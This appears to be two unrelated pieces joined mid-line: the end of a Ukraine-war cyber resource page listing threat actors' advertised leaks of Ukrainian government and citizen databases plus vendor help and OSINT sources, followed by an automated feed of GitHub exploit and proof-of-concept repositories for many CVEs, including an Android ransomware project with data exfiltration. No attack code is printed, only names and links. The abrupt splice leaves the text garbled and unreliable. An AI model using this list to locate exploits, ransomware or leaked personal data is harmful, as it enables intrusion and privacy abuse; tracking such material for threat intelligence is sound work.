| PII DB of Ukrainian digital-medicine provider (medstar\[.\]ua)                                            | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| FreeCivilian    | UA data sharing | DB of ticket.kyivcity.gov.ua                                                                              | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of id.kyivcity.gov.ua                                                                                  | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of my.kyivcity.gov.ua                                                                                  | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of portal.kyivcity.gov.ua                                                                              | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of anti-violence-map.msp.gov.ua                                                                        | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of dopomoga.msp.gov.ua                                                                                 | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of e-services.msp.gov.ua                                                                               | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of edu.msp.gov.ua                                                                                      | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of education.msp.gov.ua                                                                                | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of ek-cbi.msp.gov.ua                                                                                   | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of mail.msp.gov.ua                                                                                     | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of portal-gromady.msp.gov.ua                                                                           | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of web-minsoc.msp.gov.ua                                                                               | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of wcs-wim.dsbt.gov.ua                                                                                 | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of bdr.mvs.gov.ua                                                                                      | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of motorsich.com                                                                                       | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of dsns.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of mon.gov.ua                                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of minagro.gov.ua                                                                                      | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of zt.gov.ua                                                                                           | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of kmu.gov.ua                                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of mvs.gov.ua                                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of dsbt.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of forest.gov.ua                                                                                       | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of nkrzi.gov.ua                                                                                        | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of dabi.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of comin.gov.ua                                                                                        | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of dp.dpss.gov.ua                                                                                      | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of esbu.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of mms.gov.ua                                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of mova.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of mspu.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of nads.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of reintegration.gov.ua                                                                                | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of sies.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of sport.gov.ua                                                                                        | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of mepr.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of mfa.gov.ua                                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of va.gov.ua                                                                                           | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of mtu.gov.ua                                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of cg.mvs.gov.ua                                                                                       | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of ch-tmo.mvs.gov.ua                                                                                   | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of cp.mvs.gov.ua                                                                                       | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of cpd.mvs.gov.ua                                                                                      | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of hutirvilnij-mrc.mvs.gov.ua                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of dndekc.mvs.gov.ua                                                                                   | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of visnyk.dndekc.mvs.gov.ua                                                                            | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of dpvs.hsc.gov.ua                                                                                     | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of odk.mvs.gov.ua                                                                                      | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of e-driver\[.\]hsc\[.\]gov\[.\]ua                                                                     | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of wanted\[.\]mvs\[.\]gov\[.\]ua                                                                       | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of minregeion\[.\]gov\[.\]ua                                                                           | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of health\[.\]mia\[.\]solutions                                                                        | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of mtsbu\[.\]ua                                                                                        | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of motorsich\[.\]com                                                                                   | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of kyivcity\[.\]com                                                                                    | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of bdr\[.\]mvs\[.\]gov\[.\]ua                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of gkh\[.\]in\[.\]ua                                                                                   | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of kmu\[.\]gov\[.\]ua                                                                                  | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of mon\[.\]gov\[.\]ua                                                                                  | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of minagro\[.\]gov\[.\]ua                                                                              | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of mfa\[.\]gov\[.\]ua                                                                                  | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| Intel\_Data     | UA data sharing | PII DB (56M) of Ukrainian Citizens                                                                        | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| Kristina        | UA data sharing | DB of Ukrainian National Police (mvs\[.\]gov\[.\]ua)                                                      | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| NetSec          | UA data sharing | PII DB (53M) of Ukrainian citizens                                                                        | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| Psycho\_Killer  | UA data sharing | PII DB (56M) of Ukrainian Citizens                                                                        | No        | TA discussion in past 90 days | Exploit Forum .onion \[not linked\]                        | ​| Sp333           | UA data sharing | PII DB of Ukrainian and Russian interpreters, translators, and tour guides                                | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| Vaticano        | UA data sharing | DB of Ukrainian 'Diia' e-Governance Portal for Ministry of Digital Transformation of Ukraine \[copy\]     | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| Vaticano        | UA data sharing | DB of Ministry for Communities and Territories Development of Ukraine (minregion\[.\]gov\[.\]ua) \[copy\] | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​####​ ​`Vendor Support` ​| Vendor | Offering | URL | ​| --- | --- | --- | ​| Dragos | Access to Dragos service if from US/UK/ANZ and in need of ICS cybersecurity support | [twitter.com/RobertMLee](https://twitter.com/RobertMLee/status/1496862093588455429) | ​| GreyNoise |  Any and all `Ukrainian` emails registered to GreyNoise have been upgraded to VIP which includes full, uncapped enterprise access to all GreyNoise products | [twitter.com/Andrew___Morris](https://twitter.com/Andrew___Morris/status/1496923545712091139) | ​| Recorded Future | Providing free intelligence-driven insights, perspectives, and mitigation strategies as the situation in Ukraine evolves| [recordedfuture.com](https://www.recordedfuture.com/ukraine/) | ​| Flashpoint | Free Access to Flashpoint’s Latest Threat Intel on Ukraine | [go.flashpoint-intel.com](https://go.flashpoint-intel.com/trial/access/30days) | ​| ThreatABLE | A Ukraine tag for free threat intelligence feed that's more highly curated to cyber| [twitter.com/threatable](https://twitter.com/threatable/status/1497233721803644950) | ​| Orange | IOCs related to Russia-Ukraine 2022 conflict extracted from our Datalake Threat Intelligence platform. | [github.com/Orange-Cyberdefense](https://github.com/Orange-Cyberdefense/russia-ukraine_IOCs)| ​| FSecure | F-Secure FREEDOME VPN is now available for free in all of Ukraine | [twitter.com/FSecure](https://twitter.com/FSecure/status/1497248407303462960) | ​| Multiple vendors | List of vendors offering their services to Ukraine for free, put together by [@chrisculling](https://twitter.com/chrisculling/status/1497023038323404803) | [docs.google.com/spreadsheets](https://docs.google.com/spreadsheets/d/18WYY9p1_DLwB6dnXoiiOAoWYD8X0voXtoDl_ZQzjzUQ/edit#gid=0) | ​| Mandiant | Free threat intelligence, webinar and guidance for defensive measures relevant to the situation in Ukraine. | [mandiant.com](https://www.mandiant.com/resources/insights/ukraine-crisis-resource-center) | ​| Starlink | Satellite internet constellation operated by SpaceX providing satellite Internet access coverage to Ukraine | [twitter.com/elonmusk](https://twitter.com/elonmusk/status/1497701484003213317) | ​| Romania DNSC | Romania’s DNSC – in partnership with Bitdefender – will provide technical consulting, threat intelligence and, free of charge, cybersecurity technology to any business, government institution or private citizen of Ukraine for as long as it is necessary. | [Romania's DNSC Press Release](https://dnsc.ro/citeste/press-release-dnsc-and-bitdefender-work-together-in-support-of-ukraine)| ​| BitDefender | Access to Bitdefender technical consulting, threat intelligence and both consumer and enterprise cybersecurity technology | [bitdefender.com/ukraine/](https://www.bitdefender.com/ukraine/) | ​| NameCheap | Free anonymous hosting and domain name registration to any anti-Putin anti-regime and protest websites for anyone located within Russia and Belarus | [twitter.com/Namecheap](https://twitter.com/Namecheap/status/1498998414020861953) | ​| Avast | Free decryptor for PartyTicket ransomware | [decoded.avast.io](https://decoded.avast.io/threatresearch/help-for-ukraine-free-decryptor-for-hermeticransom-ransomware/) |  ​####​ ​`Vetted OSINT Sources` ​| Handle | Affiliation | ​| --- | --- | ​| [@KyivIndependent](https://twitter.com/KyivIndependent) | English-language journalism in Ukraine | ​| [@IAPonomarenko](https://twitter.com/IAPonomarenko) | Defense reporter with The Kyiv Independent | ​| [@KyivPost](https://twitter.com/KyivPost) | English-language journalism in Ukraine | ​| [@Shayan86](https://twitter.com/Shayan86) | BBC World News Disinformation journalist | ​| [@Liveuamap](https://twitter.com/Liveuamap) | Live Universal Awareness Map (“Liveuamap”) independent global news and information site | ​| [@DAlperovitch](https://twitter.com/DAlperovitch) | The Alperovitch Institute for Cybersecurity Studies, Founder & Former CTO of CrowdStrike | ​| [@COUPSURE](https://twitter.com/COUPSURE) | OSINT investigator for Centre for Information Resilience | ​| [@netblocks](https://twitter.com/netblocks) | London-based Internet's Observatory | ​####​ ​`Miscellaneous Resources` ​| Source | URL | Content | ​| --- | --- | --- | ​| PowerOutages.com | https://poweroutage.com/ua | Tracking PowerOutages across Ukraine | ​| Monash IP Observatory | https://twitter.com/IP_Observatory | Tracking IP address outages across Ukraine | ​| Project Owl Discord | https://discord.com/invite/projectowl | Tracking foreign policy, geopolitical events, military and governments, using a Discord-based crowdsourced approach, with a current emphasis on Ukraine and Russia | ​| russianwarchatter.info | https://www.russianwarchatter.info/ | Known Russian Military Radio Frequencies |** : [Nate0634034090/bug-free-memory](https://github.com/Nate0634034090/bug-free-memory) create time: 2022-03-04T09:00:59Z

**cve-2022-22947 spring cloud gateway 批量扫描脚本** : [dingxiao77/-cve-2022-22947-](https://github.com/dingxiao77/-cve-2022-22947-) create time: 2022-03-04T07:24:58Z

**CVE-2021-42013批量** : [tangxiaofeng7/CVE-2022-22947-Spring-Cloud-Gateway](https://github.com/tangxiaofeng7/CVE-2022-22947-Spring-Cloud-Gateway) create time: 2022-03-04T06:38:26Z

**日常更新一些顺手写的gobypoc,包含高危害EXP** : [york-cmd/CVE-2022-22947-goby](https://github.com/york-cmd/CVE-2022-22947-goby) create time: 2022-03-04T05:45:05Z

**Exp** : [BerMalBerIst/CVE-2022-22947](https://github.com/BerMalBerIst/CVE-2022-22947) create time: 2022-03-04T05:26:33Z

**poc for cve-2022-22947** : [scopion/cve-2022-22947](https://github.com/scopion/cve-2022-22947) create time: 2022-03-03T09:30:37Z

**port of CVE-2021-4034 exploit to Rust/cargo for my own edification** : [defhacks/cve-2021-4034](https://github.com/defhacks/cve-2021-4034) create time: 2022-03-04T03:47:53Z

**Spring Cloud Gateway远程代码执行漏洞** : [Summer177/Spring-Cloud-Gateway-CVE-2022-22947-](https://github.com/Summer177/Spring-Cloud-Gateway-CVE-2022-22947-) create time: 2022-03-04T02:36:02Z

**Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)** : [helloexp/CVE-2022-22947](https://github.com/helloexp/CVE-2022-22947) create time: 2022-03-04T02:29:02Z

**no description** : [Greetdawn/CVE-2022-22947](https://github.com/Greetdawn/CVE-2022-22947) create time: 2022-03-04T02:27:50Z

**no description** : [skentagon/CVE-2021-41773](https://github.com/skentagon/CVE-2021-41773) create time: 2022-02-27T22:39:58Z

**SpringCloudGatewayRCE - CVE-2022-22947 / Code By:Tas9er** : [Tas9er/SpringCloudGatewayRCE](https://github.com/Tas9er/SpringCloudGatewayRCE) create time: 2022-03-03T19:45:18Z

**CVE-2021-4034** : [Jesrat/make_me_root](https://github.com/Jesrat/make_me_root) create time: 2022-03-03T18:29:11Z

**Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE)** : [carlosevieira/CVE-2022-22947](https://github.com/carlosevieira/CVE-2022-22947) create time: 2022-03-03T18:26:18Z

**no description** : [micha3lcve/CVE-2021-44228-Mass-RCE](https://github.com/micha3lcve/CVE-2021-44228-Mass-RCE) create time: 2022-03-03T17:18:43Z

**RFI to RCE Nagios/NagiosXI exploitation** : [ArianeBlow/NagiosXI-RCE-all-version-CVE-2021-40345](https://github.com/ArianeBlow/NagiosXI-RCE-all-version-CVE-2021-40345) create time: 2021-06-02T21:39:53Z

**Spring_CVE_2022_22947:Spring Cloud Gateway现高风险漏洞cve,poc漏洞利用,一键利用,开箱即用** : [wjl110/Spring_CVE_2022_22947](https://github.com/wjl110/Spring_CVE_2022_22947) create time: 2022-03-03T16:56:37Z

**Spring Cloud Gateway 远程代码执行漏洞Exp Spring_Cloud_Gateway_RCE_Exp-CVE-2022-22947** : [Axx8/CVE-2022-22947_Rce_Exp](https://github.com/Axx8/CVE-2022-22947_Rce_Exp) create time: 2022-03-03T13:13:02Z

**Spring cloud gateway code injection : CVE-2022-22947** : [Vulnmachines/spring-cve-2022-22947](https://github.com/Vulnmachines/spring-cve-2022-22947) create time: 2022-03-03T11:14:37Z

**CVE-2022-22947 RCE** : [shakeman8/CVE-2022-22947-RCE](https://github.com/shakeman8/CVE-2022-22947-RCE) create time: 2022-03-03T10:44:36Z

**This repository contains files for reproducing the vulnerability.** : [yasin-cs-ko-ak/grafana-cve-2021-43798](https://github.com/yasin-cs-ko-ak/grafana-cve-2021-43798) create time: 2022-03-03T09:37:46Z

**poc for cve-2022-22947** : [cgddgc/cve-2022-22947](https://github.com/cgddgc/cve-2022-22947) create time: 2022-03-03T09:24:36Z

**Kali linux _ CVE 2019 - 2022** : [AhnSungHoon/Kali_CVE](https://github.com/AhnSungHoon/Kali_CVE) create time: 2022-03-03T07:16:21Z

**Test tool for CVE-2020-1472** : [Anonymous-Family/CVE-2020-1472](https://github.com/Anonymous-Family/CVE-2020-1472) create time: 2022-03-03T02:00:21Z

**Zero-day-scanning is a Domain Controller vulnerability scanner, that currently includes checks for Zero-day-scanning (CVE-2020-1472), MS-PAR/MS-RPRN and SMBv2 Signing.** : [Anonymous-Family/Zero-day-scanning](https://github.com/Anonymous-Family/Zero-day-scanning) create time: 2022-03-03T01:55:28Z

**Exploiting Linux Kernel Vulnerability: Dirty Cow (CVE-2016-5195)** : [ellietoulabi/Dirty-Cow](https://github.com/ellietoulabi/Dirty-Cow) create time: 2022-03-02T19:06:36Z

**CVE-2018-11235-Git-Submodule-CE + Docker Ngrok Configuration** : [twseptian/CVE-2018-11235-Git-Submodule-CE-and-Docker-Ngrok-Configuration](https://github.com/twseptian/CVE-2018-11235-Git-Submodule-CE-and-Docker-Ngrok-Configuration) create time: 2022-03-02T16:26:52Z

**A "Creation of Temporary Files in Directory with Insecure Permissions" vulnerability in PrintixService.exe, in Printix's "Printix Secure Cloud Print Management", Version 1.3.1106.0 and below allows any logged in user to elevate any executable or file to the SYSTEM context. This is achieved by exploiting race conditions in the Installer.** : [ComparedArray/printix-CVE-2022-25090](https://github.com/ComparedArray/printix-CVE-2022-25090) create time: 2022-03-02T13:14:11Z

**no description** : [takumak/cve-2019-5736-reproducer](https://github.com/takumak/cve-2019-5736-reproducer) create time: 2022-03-02T14:57:08Z

**polkit-pkexec local privilege escalation vulnerability** : [Xuanyaz/CVE-2021-4034](https://github.com/Xuanyaz/CVE-2021-4034) create time: 2022-03-02T13:07:00Z

**no description** : [lucksec/Spring-Cloud-Gateway-CVE-2022-22947](https://github.com/lucksec/Spring-Cloud-Gateway-CVE-2022-22947) create time: 2022-03-02T11:58:55Z

**Tools for get offsets and adding patch for support i386** : [usernameid0/tools-for-CVE-2018-1000001](https://github.com/usernameid0/tools-for-CVE-2018-1000001) create time: 2022-03-01T21:27:37Z

**no description** : [PaloAltoNetworks/can-ctr-escape-cve-2022-0492](https://github.com/PaloAltoNetworks/can-ctr-escape-cve-2022-0492) create time: 2022-02-28T01:25:26Z

**CVE-2022-23361** : [ViNi0608/CVE-2022-23361](https://github.com/ViNi0608/CVE-2022-23361) create time: 2022-03-01T17:08:19Z

**no description** : [usernameid0/CVE-2018-1000857-i386](https://github.com/usernameid0/CVE-2018-1000857-i386) create time: 2022-03-01T17:13:01Z

**no description** : [Mr-xn/CVE-2022-25064](https://github.com/Mr-xn/CVE-2022-25064) create time: 2022-03-01T15:10:20Z

**cve-2018-6574** : [twseptian/cve-2018-6574](https://github.com/twseptian/cve-2018-6574) create time: 2022-03-01T13:42:50Z

**iOS 15.1 kernel exploit POC for CVE-2021-30955** : [b1n4r1b01/desc_race](https://github.com/b1n4r1b01/desc_race) create time: 2022-03-01T12:41:03Z

**https://gist.github.com/jakeajames/37f72c58c775bfbdda3aa9575149a8aa compiled into a ipa** : [verygenericname/CVE-2021-30955-POC-IPA](https://github.com/verygenericname/CVE-2021-30955-POC-IPA) create time: 2022-02-28T23:28:39Z

**Proof of concept (wrapped into an iOS app) for CVE-2021-30955** : [nickorlow/CVE-2021-30955-POC](https://github.com/nickorlow/CVE-2021-30955-POC) create time: 2022-02-28T22:23:51Z

**This script is intended to validate Apache Struts 2 vulnerability (CVE-2017-5638), AKA Struts-Shock.** : [readloud/CVE-2017-5638](https://github.com/readloud/CVE-2017-5638) create time: 2022-02-28T14:49:52Z

**no description** : [timb-machine-mirrors/CVE-2021-30955](https://github.com/timb-machine-mirrors/CVE-2021-30955) create time: 2022-02-28T14:54:10Z

**A python exploit to automatically dump all the data stored by the auto-completion plugin of Ametys CMS to a local sqlite database file.** : [p0dalirius/CVE-2022-26159-Ametys-Autocompletion-XML](https://github.com/p0dalirius/CVE-2022-26159-Ametys-Autocompletion-XML) create time: 2022-02-21T19:59:11Z

**Zabbix - SAML SSO Authentication Bypass** : [kh4sh3i/CVE-2022-23131](https://github.com/kh4sh3i/CVE-2022-23131) create time: 2022-02-28T10:37:02Z

**POC for KeePass [CVE-2022-0725]** : [ByteHackr/keepass_poc](https://github.com/ByteHackr/keepass_poc) create time: 2022-02-28T06:53:37Z

**CVE-2022-0529 & CVE-2022-0530** : [ByteHackr/unzip_poc](https://github.com/ByteHackr/unzip_poc) create time: 2022-02-28T05:44:52Z

**CVE-2022-0529 & CVE-2022-0530** : [nanaao/unzip_poc](https://github.com/nanaao/unzip_poc) create time: 2022-02-28T05:20:03Z

**no description** : [movvamrocks/PwnKit-CVE-2021-4034](https://github.com/movvamrocks/PwnKit-CVE-2021-4034) create time: 2022-02-28T04:41:40Z

**Android Ransomware Development - AES256 encryption + CVE-2019-2215 + Data Exfiltration** : [nicchongwb/Rootsmart-v2.0](https://github.com/nicchongwb/Rootsmart-v2.0) create time: 2022-02-28T02:34:31Z

**no description** : [l00neyhacker/CVE-2022-26158](https://github.com/l00neyhacker/CVE-2022-26158) create time: 2022-02-28T03:51:56Z

**no description** : [l00neyhacker/CVE-2022-26157](https://github.com/l00neyhacker/CVE-2022-26157) create time: 2022-02-28T03:51:05Z

**no description** : [l00neyhacker/CVE-2022-26156](https://github.com/l00neyhacker/CVE-2022-26156) create time: 2022-02-28T03:50:12Z

**no description** : [l00neyhacker/CVE-2022-26155](https://github.com/l00neyhacker/CVE-2022-26155) create time: 2022-02-28T03:47:15Z

**CVE-2022-1111** : [KiritoLoveAsuna/CVE-2022-1111](https://github.com/KiritoLoveAsuna/CVE-2022-1111) create time: 2022-02-28T01:08:03Z

**kctf exploit** : [shahparkhan/cve-2022-0185](https://github.com/shahparkhan/cve-2022-0185) create time: 2022-02-27T13:42:02Z

**no description** : [Fa1c0n35/zabbix-cve-2022-23131](https://github.com/Fa1c0n35/zabbix-cve-2022-23131) create time: 2022-02-27T11:30:53Z

**PoC for CVE-2022-21971 "Windows Runtime Remote Code Execution Vulnerability"** : [0vercl0k/CVE-2022-21971](https://github.com/0vercl0k/CVE-2022-21971) create time: 2022-02-26T20:37:42Z

**PoC for CVE-2022-21974 "Roaming Security Rights Management Services Remote Code Execution Vulnerability"** : [0vercl0k/CVE-2022-21974](https://github.com/0vercl0k/CVE-2022-21974) create time: 2022-02-26T18:53:56Z

**Exploit PoC for CVE-2020-18326** : [hamm0nz/CVE-2020-18326](https://github.com/hamm0nz/CVE-2020-18326) create time: 2022-02-26T17:30:41Z

**no description** : [hamm0nz/CVE-2020-18325](https://github.com/hamm0nz/CVE-2020-18325) create time: 2022-02-26T17:06:09Z

**Tor Browser 9.0.7 on Windows 10 build 10586 is vulnerable to information disclosure. This could allow local attackers to bypass the intended anonymity feature and obtain information regarding the onion services visited by a local user. This can be accomplished by analyzing RAM memory even several hours after the local user used the product. This occurs because the product doesn't properly free memory.** : [malakkf/CVE-2021-46702](https://github.com/malakkf/CVE-2021-46702) create time: 2022-02-26T13:52:44Z

**CVE-2022-24086 RCE** : [shakeman8/CVE-2022-24086-RCE](https://github.com/shakeman8/CVE-2022-24086-RCE) create time: 2022-02-26T10:12:45Z

**no description** : [innxrmxst/CVE-2021-3560](https://github.com/innxrmxst/CVE-2021-3560) create time: 2022-02-25T20:30:31Z

**Apache APISIX batch-requests RCE(CVE-2022-24112)** : [Axx8/CVE-2022-24112](https://github.com/Axx8/CVE-2022-24112) create time: 2022-02-25T15:17:28Z

**Script to demonstrate the Grafana directory traversal exploit (CVE-2021-43798).** : [Jroo1053/GrafanaDirInclusion](https://github.com/Jroo1053/GrafanaDirInclusion) create time: 2022-02-25T09:26:40Z

**no description** : [MoritzHuppert/CVE-2022-25022](https://github.com/MoritzHuppert/CVE-2022-25022) create time: 2022-02-25T08:26:12Z

**no description** : [MoritzHuppert/CVE-2022-25020](https://github.com/MoritzHuppert/CVE-2022-25020) create time: 2022-02-25T08:24:44Z

**no description** : [MoritzHuppert/CVE-2022-25018](https://github.com/MoritzHuppert/CVE-2022-25018) create time: 2022-02-25T08:23:49Z

**POC for CVE-2022-24124** : [ColdFusionX/CVE-2022-24124](https://github.com/ColdFusionX/CVE-2022-24124) create time: 2022-02-25T07:55:55Z

**no description** : [hahaleyile/CVE-2021-4034](https://github.com/hahaleyile/CVE-2021-4034) create time: 2022-02-25T01:30:09Z

**Python Scanner for TestRail servers vulnerable to CVE-2021-40875** : [Lul/TestRail-files.md5-IAC-scanner](https://github.com/Lul/TestRail-files.md5-IAC-scanner) create time: 2022-02-24T19:52:01Z

**no description** : [bkojusner/CVE-2021-25461](https://github.com/bkojusner/CVE-2021-25461) create time: 2022-02-24T17:28:58Z

**Exploit PoC of CVE-2020-18324** : [hamm0nz/CVE-2020-18324](https://github.com/hamm0nz/CVE-2020-18324) create time: 2022-02-24T15:38:11Z

**A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228** : [Ananya-0306/Log-4j-scanner](https://github.com/Ananya-0306/Log-4j-scanner) create time: 2022-02-24T13:49:14Z

**Exploit for CVE-2022-22845 - Unauthenticated Admin Takeover On QXIP SIPCAPTURE Homer-App up to 1.4.27** : [OmriBaso/CVE-2022-22845-Exploit](https://github.com/OmriBaso/CVE-2022-22845-Exploit) create time: 2022-02-24T13:40:12Z

**no description** : [pykiller/CVE-2022-23131](https://github.com/pykiller/CVE-2022-23131) create time: 2022-02-24T11:34:27Z

**Automated PoC of CVE-2021-44521** : [QHpix/CVE-2021-44521](https://github.com/QHpix/CVE-2021-44521) create time: 2022-02-24T11:07:34Z

**no description** : [trganda/CVE-2022-23131](https://github.com/trganda/CVE-2022-23131) create time: 2022-02-24T08:10:46Z

**Zabbix SSO Bypass** : [random-robbie/cve-2022-23131-exp](https://github.com/random-robbie/cve-2022-23131-exp) create time: 2022-02-23T16:34:03Z

**no description** : [polling-repo-continua/CVE-2022-25257](https://github.com/polling-repo-continua/CVE-2022-25257) create time: 2022-02-20T06:42:24Z

**CVE-2022-0529 & CVE-2022-0530** : [ByteHackr/unzip_poc](https://github.com/ByteHackr/unzip_poc) create time: 2022-02-23T14:15:53Z

**no description** : [pazhanivel07/frameworks_av-10-r33_CVE-2020-0242](https://github.com/pazhanivel07/frameworks_av-10-r33_CVE-2020-0242) create time: 2022-02-23T11:48:10Z

**no description** : [pazhanivel07/frameworks_base_CVE-2020-0209](https://github.com/pazhanivel07/frameworks_base_CVE-2020-0209) create time: 2022-02-23T10:44:33Z

**no description** : [Blackyguy/-CVE-2012-2661-ActiveRecord-SQL-injection-](https://github.com/Blackyguy/-CVE-2012-2661-ActiveRecord-SQL-injection-) create time: 2022-02-23T10:15:59Z

**no description** : [pazhanivel07/Settings_10-r33_CVE-CVE-2020-0219](https://github.com/pazhanivel07/Settings_10-r33_CVE-CVE-2020-0219) create time: 2022-02-23T10:10:23Z

